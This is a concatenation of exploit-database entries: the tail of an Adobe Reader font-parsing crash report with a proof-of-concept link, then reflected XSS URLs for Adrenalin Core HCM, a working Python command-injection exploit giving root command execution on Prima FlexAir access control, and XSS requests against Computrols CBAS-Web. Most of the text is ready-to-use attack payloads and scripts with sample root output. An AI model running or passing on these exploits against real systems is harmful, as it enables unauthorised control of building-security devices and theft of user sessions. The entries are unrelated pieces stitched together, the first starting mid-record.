AcroRd32!DllCanUnloadNow+0x14b35a 29 047feac4 5fd92d3c 5ee78ef8 047feb48 00000000 AcroRd32!DllCanUnloadNow+0x14b1ed 2a 047feb7c 5fd92762 00000001 00000000 dd9e12fc AcroRd32!DllCanUnloadNow+0x149ddc 2b 047febd4 5fd9257a 7313eef0 00000001 dd9e1510 AcroRd32!DllCanUnloadNow+0x149802 2c 047fec38 5fd922ff 047fed2c dd9e1464 81ff8fa0 AcroRd32!DllCanUnloadNow+0x14961a 2d 047fed4c 5fc5687c 81ff8fa0 5fc567a0 00000000 AcroRd32!DllCanUnloadNow+0x14939f 2e 047fed64 5fc5678f 0000000f 00000000 00000000 AcroRd32!DllCanUnloadNow+0xd91c 2f 047fed80 745de0bb 03870c42 0000000f 00000000 AcroRd32!DllCanUnloadNow+0xd82f 30 047fedac 745e8849 5fc566d0 03870c42 0000000f USER32!_InternalCallWinProc+0x2b 31 047fedd0 745eb145 0000000f 00000000 00000000 USER32!InternalCallWinProc+0x20 32 047feea0 745d8503 5fc566d0 00000000 0000000f USER32!UserCallWinProcCheckWow+0x1be 33 047fef08 745d8aa0 13ff4e80 00000000 0000000f USER32!DispatchClientMessage+0x1b3 34 047fef50 77371a6d 047fef6c 00000020 047fefcc USER32!__fnDWORD+0x50 35 047fef88 745d91ee 047ff01c e165025c 18170dd8 ntdll!KiUserCallbackDispatcher+0x4d 36 047fefdc 745d8c20 e51aed80 047ff000 5fc6da6d USER32!DispatchMessageWorker+0x5be 37 047fefe8 5fc6da6d 047ff01c 18170dd8 18170dd8 USER32!DispatchMessageW+0x10 38 047ff000 5fc6d89e 047ff01c dd9e095c 18170dd8 AcroRd32!DllCanUnloadNow+0x24b0d 39 047ff074 5fc6d744 dd9e0984 18170dd8 00000000 AcroRd32!DllCanUnloadNow+0x2493e 3a 047ff0ac 5fbfc575 dd9e0834 16d7eff8 00000000 AcroRd32!DllCanUnloadNow+0x247e4 3b 047ff11c 5fbfbf81 5fbd0000 00110000 16d7eff8 AcroRd32!AcroWinMainSandbox+0x775 3c 047ff53c 0011783d 5fbd0000 00110000 16d7eff8 AcroRd32!AcroWinMainSandbox+0x181 3d 047ff908 002201aa 00110000 00000000 0b61b3f2 AcroRd32_exe+0x783d 3e 047ff954 76698674 0480b000 76698650 5ab919ba AcroRd32_exe!AcroRd32IsBrokerProcess+0x992da 3f 047ff968 77365e17 0480b000 666934db 00000000 KERNEL32!BaseThreadInitThunk+0x24 40 047ff9b0 77365de7 ffffffff 7738ad9b 00000000 ntdll!__RtlUserThreadStart+0x2f 41 047ff9c0 00000000 00111390 0480b000 00000000 ntdll!_RtlUserThreadStart+0x1b --- cut --- Notes: - Reproduces on Adobe Acrobat Reader DC (2019.012.20036) on Windows 10, with and without PageHeap enabled, but most consistently with PageHeap (thanks to the allocation marker bytes). - The crash occurs immediately after opening the PDF document, and is caused by dereferencing an uninitialized pointer from the heap. With PageHeap enabled, all new allocations are filled with the 0xc0c0c0... marker, which is visible in the crash log above. - Attached samples: poc.pdf (crashing file), original.pdf (original file). - We have minimized the difference between the original and mutated files down to three bytes at offsets 0x71a4, 0x71a5 and 0x71ba. They were changed from 0x1C, 0x14, 0x89 to 0xFF, 0xFF, 0x0E. When we analyzed it further, we determined that these bytes reside inside the "CFF " table of the embedded OpenType font. After extracting the font and decompiling it with the ttx tool from FontTools, we found that the difference is in the CharString of the "afii10091" glyph. Original code: --- cut --- [...] cntrmask 00011100 cntrmask 00000110 32 hmoveto 660 hlineto 120 0 32 -22 15 -146 rrcurveto 28 0 -13 203 -2 0 rlineto [...] --- cut --- Mutated code: --- cut --- [...] cntrmask 11111111 1707.08974 -99 hlineto 120 0 32 -22 15 -146 rrcurveto 28 0 -13 203 endchar 0 rlineto [...] --- cut --- Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47610.zip

# Exploit Title: Adrenalin Core HCM 5.4.0 - 'prntDDLCntrlName' Reflected Cross-Site Scripting # Google Dork: NA # Date: 2018-09-06 # Exploit Author: Rishu Ranjan (Cy83rl0gger) # Vendor Homepage: https://www.myadrenalin.com/ # Software Link: https://www.myadrenalin.com/core-hcm/ # Version: 5.4.0 (REQUIRED) # Tested on: NA # CVE : CVE-2018-12650 # Type: webapps # Platform: Multiple # Description # ==================== # A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in Adrenalin Core HCM v5.4.0 HRMS Software. # The user supplied input containing malicious JavaScript is echoed back as it is in JavaScript code in an HTML response. URL ==================== https://<Host:port>/myadrenalin/AppMaint/ApplicationtEmployeeSearch.aspx?popToken=emp&prntFrmName=AppAccFrm76096%22%3balert(1)%2f%2f150&prntDDLCntrlName=hdnEmpSearch&HRShow=0&CntrlType=txt&Applicationid=&Grade=undefined https://<Host:port>/Adrenalin/AppMaint/ApplicationtEmployeeSearch.aspx?popToken=emp&prntFrmName=AppAccFrm76096%22%3balert(1)%2f%2f150&prntDDLCntrlName=hdnEmpSearch&HRShow=0&CntrlType=txt&Applicationid=&Grade=undefined Parameter ==================== prntDDLCntrlName prntFrmName Attack Type ==================== Remote CVE Impact Other ==================== Allows an attacker to input malicious JavaScript which can steal cookie, redirect them to other malicious website, etc. Reference ==================== https://nvd.nist.gov/vuln/detail/CVE-2018-12650 https://www.knowcybersec.com/2018/10/CVE-2018-12650-reflected-XSS.html Discoverer ==================== Rishu Ranjan

# Exploit Title: Prima FlexAir Access Control 2.3.38 - Remote Code Execution # Google Dork: NA # Date: 2018-09-06 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.primasystems.eu/ # Software Link: https://primasystems.eu/flexair-access-control/ # Version: 2.3.38 # Tested on: NA # CVE : CVE-2019-7670 #!/usr/bin/env python # # Authenticated Remote Root Exploit for Prima FlexAir Access Control 2.3.38 # via Command Injection in SetNTPServer request, Server parameter. # # CVE: CVE-2019-7670 # Advisory: https://applied-risk.com/resources/ar-2019-007 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system # # By Gjoko 'LiquidWorm' Krstic # # 18.01.2019 # ############################################################################ # # $ python ntpcmdinj.py # [+] Usage: python ntpcmdinj.py [Target] [Session-ID] [Command] # [+] Example: python ntpcmdinj.py http://10.0.251.17:8080 10167847 whoami # # $ python ntpcmdinj.py http://192.168.230.17:8080 11339284 "uname -a" # Linux Alpha 4.4.16 #1 Mon Aug 29 13:29:40 CEST 2016 armv7l GNU/Linux # # $ python ntpcmdinj.py http://192.168.230.17:8080 11339284 id # uid=0(root) gid=0(root) groups=0(root),10(wheel) # ############################################################################ # import requests import sys##### if len(sys.argv) < 4: print '[+] Usage: python ntpcmdinj.py [Target] [Session-ID] [Command]' print '[+] Example: python ntpcmdinj.py http://10.0.0.17:8080 10167847 whoami\n' sys.exit() host = sys.argv[1] sessionid = sys.argv[2] commando = sys.argv[3] url = host+"/bin/sysfcgi.fx" headers = {"Session-ID" : sessionid, # Muy importante! "User-Agent" : "Dj/Ole", "Content-Type" : "application/x-www-form-urlencoded; charset=UTF-8", "Accept" : "text/html, */*; q=0.01", "Session-Pc" : "2", "X-Requested-With" : "XMLHttpRequest", "Accept-Encoding" : "gzip, deflate", "Accept-Language" : "en-US,en;q=0.9"} payload = ("<requests><request name=\"SetNTPServer\">" "<param name=\"Server\" value=\"2.europe.p" "ool.ntp.org;"+commando+">/www/pages/ap" "p/images/logos/stage.txt|\"/></request></" "requests>") requests.post(url, headers=headers, data=payload) e = requests.get(host+"/app/images/logos/stage.txt") print e.text

# Exploit Title: Computrols CBAS-Web 19.0.0 - 'username' Reflected Cross-Site Scripting # Google Dork: NA # Date: 2018-09-06 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/ # Software Link: https://www.computrols.com/building-automation-software/ # Version: 19.0.0 # Tested on: NA # CVE : CVE-2019-10846 # Advisory: https://applied-risk.com/resources/ar-2019-009 # Paper: https://applied-risk.com/resources/i-own-your-building-management-system POST /cbas/index.php?m=auth&a=verifyid HTTP/1.1 username="><script>confirm(document.cookie)</script>&submit_button=Send+Me+a+New+Password+Via+Email ======= POST /cbas/index.php?m=auth&a=login HTTP/1.1 username="><marquee>htmlinjection</marquee>&password=&challenge=60753c1b5e449de80e21472b5911594d&response=e16371917371b8b70529737813840c62 ======= GET /cbas/index.php?m=auth&a=login&username="><marquee>my milkshake brings all the boys to the yard.</marquee>&password=damn_right HTTP/1.1